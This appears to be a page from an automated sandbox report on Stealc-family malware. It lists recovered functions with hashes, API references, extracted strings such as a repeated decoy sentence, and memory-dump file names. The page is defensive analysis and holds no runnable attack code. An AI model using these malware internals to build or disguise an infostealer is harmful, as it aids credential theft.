Opcode Fuzzy Hash: 5c7674760ed0755b036bc1e799b3c8b2aba6b35fcc5ca966f170227408aca583
Instruction Fuzzy Hash: C4E0EC30641A48ABCF25BB14D91994C3B6AEB95358F548424FC144A232CBA6ED82DB95

Function 00C8A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 7ea6801bec71ae29f30139dedf6e0e4199e820541da59902c5e07cfbe7eb1261
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 6DE04632A11228EBCB15EB88890898AF2ACEB48B04F154096B501D3240C270DF00D7D4

Function 00C62E20 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

8KG0fymoFx==, xrefs: 00C62EC7
stoi argument out of range, xrefs: 00C64269
Fz==, xrefs: 00C6369E
invalid stoi argument, xrefs: 00C6425A
246122658369, xrefs: 00C633D4
HBhr, xrefs: 00C6378F
WGt=, xrefs: 00C633BA

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: 72b56f1e250ecfee12eb4d5b439ba0e7226ae23fcbb8c4f194ec545fcc07354c
Instruction ID: d6f88e5823b8283abd42b9e8c38c338cae139d4f6bf38397a4e009a623df53d0
Opcode Fuzzy Hash: 72b56f1e250ecfee12eb4d5b439ba0e7226ae23fcbb8c4f194ec545fcc07354c
Instruction Fuzzy Hash: 8B02C470A00248DFEF24EFA8C895BDEBBB5EF05304F504558E805A72C2D7759B85DBA2

Function 00C84770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00C847A7
___except_validate_context_record.LIBVCRUNTIME ref: 00C847AF
_ValidateLocalCookies.LIBCMT ref: 00C84838
__IsNonwritableInCurrentImage.LIBCMT ref: 00C84863
_ValidateLocalCookies.LIBCMT ref: 00C848B8

Strings

csm, xrefs: 00C8484D

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4db6d23cafede7d3d7b5aa208fe7352ac98d3e78a058f4c3dcbe6becf23a73e5
Instruction ID: c2aa04c19f3a5019a0db1b6bd364bc283ae9c48e1838d5393ce3b2fc28a857cb
Opcode Fuzzy Hash: 4db6d23cafede7d3d7b5aa208fe7352ac98d3e78a058f4c3dcbe6becf23a73e5
Instruction Fuzzy Hash: 1C51E734A0025A9BCF18FF68C885AAE7BB6AF4531CF148155E814DB392D732DF45CB94

Function 00C95942 Relevance: 8.9, Strings: 7, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

Strings

log10, xrefs: 00C9599D, 00C959AC
pow, xrefs: 00C959F9, 00C95AA3, 00C95AF0
asin, xrefs: 00C95A88
acos, xrefs: 00C95A91
exp, xrefs: 00C959DA, 00C95A3F
log, xrefs: 00C959B8, 00C959C7
sqrt, xrefs: 00C95A9A

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 0-3064271455
Opcode ID: fb291b60424aef093aaed9e97e79e51f820edf29b6ecdd35a667ba53fc05e43e
Instruction ID: 7ad9b353863c758b32bdd336edf88da0c6f004f009a2562f8e945dcb6e333cdc
Opcode Fuzzy Hash: fb291b60424aef093aaed9e97e79e51f820edf29b6ecdd35a667ba53fc05e43e
Instruction Fuzzy Hash: 005192B0904A0ACFDF029F59D88C1BDBFB4FF45318F114245D990A7264CB758A26DF58

Function 00C870C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00C8710B

Strings

.cmd, xrefs: 00C87129
.com, xrefs: 00C8714B
.exe, xrefs: 00C87118
.bat, xrefs: 00C8713A

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 2da8c38d188ad9263086ce9caed7406564f8f93d37bd800e4cde2d371b7ad9dc
Instruction ID: 5658a4615610eb7d182a0c8f57b63c6f9c131ff450d39f5ed522be32273f635a
Opcode Fuzzy Hash: 2da8c38d188ad9263086ce9caed7406564f8f93d37bd800e4cde2d371b7ad9dc
Instruction Fuzzy Hash: 5601C82761862726661874199C0263F17989B83BBC735022AF958F77C1FE84DD425398

Function 00C52E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00C52F1F
__Mtx_unlock.LIBCPMT ref: 00C52F8C
__Cnd_broadcast.LIBCPMT ref: 00C52FA3
__Mtx_unlock.LIBCPMT ref: 00C530B5
__Mtx_unlock.LIBCPMT ref: 00C5315B

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: ab0c93b59b942977e5e43664cb9a7dfecc84c33b09f0052b34c5795c5976f53a
Instruction ID: 9e7376365837027f396a92b91ea08b3586df3fa553e1f7bbf757129b45fc0b05
Opcode Fuzzy Hash: ab0c93b59b942977e5e43664cb9a7dfecc84c33b09f0052b34c5795c5976f53a
Instruction Fuzzy Hash: 6EA100B4A007559FDB21DBA4C9847AEB7F8FF15355F004229E826D7281EB30EA48CB95

Function 00C8C9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C8CA37

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: 071030fe98cceb0995570911c284f3a0e411328f213422cf9e07fbd71c60d080
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: B1B145329006459FDB15EF28C8C1BFEBBE1EF55348F1481AAE859EB241D6348E41CB78

Function 00C6BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00C6BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 00C6BB14
_xtime_get.LIBCPMT ref: 00C6BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 00C6BB43

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 6732d6fde827971c0f82e1fcbeed24fc761d38fe22feb62485f50b842837df8c
Instruction ID: cbf0d11e03c6220f9386c920b3f16ac99e128ab548ca6e5aa34a24b652add86d
Opcode Fuzzy Hash: 6732d6fde827971c0f82e1fcbeed24fc761d38fe22feb62485f50b842837df8c
Instruction Fuzzy Hash: E0213171E012199FDF20EFA4DDC5ABEBBB8EF48714F100065F601A7251DB35AE41ABA1

Function 00C542C0 Relevance: 5.1, Strings: 4, Instructions: 82COMMON

Download Yara Rule

Strings

future already retrieved, xrefs: 00C5440A
promise already satisfied, xrefs: 00C54411
broken promise, xrefs: 00C54403
no state, xrefs: 00C54418

Memory Dump Source

Source File: 0000000D.00000002.3749374563.0000000000C51000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C50000, based on PE: true

Associated: 0000000D.00000002.3749184623.0000000000C50000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749374563.0000000000CB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749810156.0000000000CB9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000CBB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F1E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F4D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F57000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3749945185.0000000000F66000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3753567505.0000000000F67000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754669489.0000000001107000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.3754764180.0000000001109000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c50000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: broken promise$future already retrieved$no state$promise already satisfied
API String ID: 0-3399861469
Opcode ID: 80c88ea41f47b87c9725c0a1567f53df56dec34ffc239e111f3f14e5dcfbae5b
Instruction ID: c32fe102795ee3ee14c48e7c9b1ce0366ed50a79fe32afaac3326d1fd859d43e
Opcode Fuzzy Hash: 80c88ea41f47b87c9725c0a1567f53df56dec34ffc239e111f3f14e5dcfbae5b
Instruction Fuzzy Hash: D221F6756016008FD728CF19C848B2EB7E5FF84729F048A1DE856CB7A0DB35AD84CB84

Analysis Process: stealc_default2.exePID: 4092, Parent PID: 8068COMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	29

Executed Functions

Function 007745C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745CC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745D7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745E2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745ED
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 007745F8
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,007869FB), ref: 00774607
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,007869FB), ref: 0077460E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 0077461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 0077463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774648
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 0077465C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774667
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774672
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 0077467D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,007869FB), ref: 00774688
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746B1
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746BC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746C7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 007746DD
strlen.MSVCRT ref: 007746F0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774718
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774723
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0077472E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774739
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774744
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774754
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0077475F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0077476A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774775
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00774780
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0077479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007745E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007746CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00774713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0077477B
